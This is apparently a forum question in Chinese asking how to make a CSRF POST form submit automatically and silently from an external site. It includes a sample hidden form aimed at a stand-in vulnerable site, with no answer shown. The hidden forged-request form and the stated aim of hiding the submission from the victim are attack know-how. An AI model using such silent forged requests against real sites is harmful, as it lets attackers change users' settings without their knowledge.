【发布时间】:2013-07-30 05:35:44
【问题描述】:
我很想知道如何在没有用户通知的情况下静默提交 CSRF 的 POST 表单(重定向到 POSTed URL 的文档位置不是静默的)。
例子:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
在外部网站上,我需要做什么才能自动且静默地触发此表单?
【问题讨论】: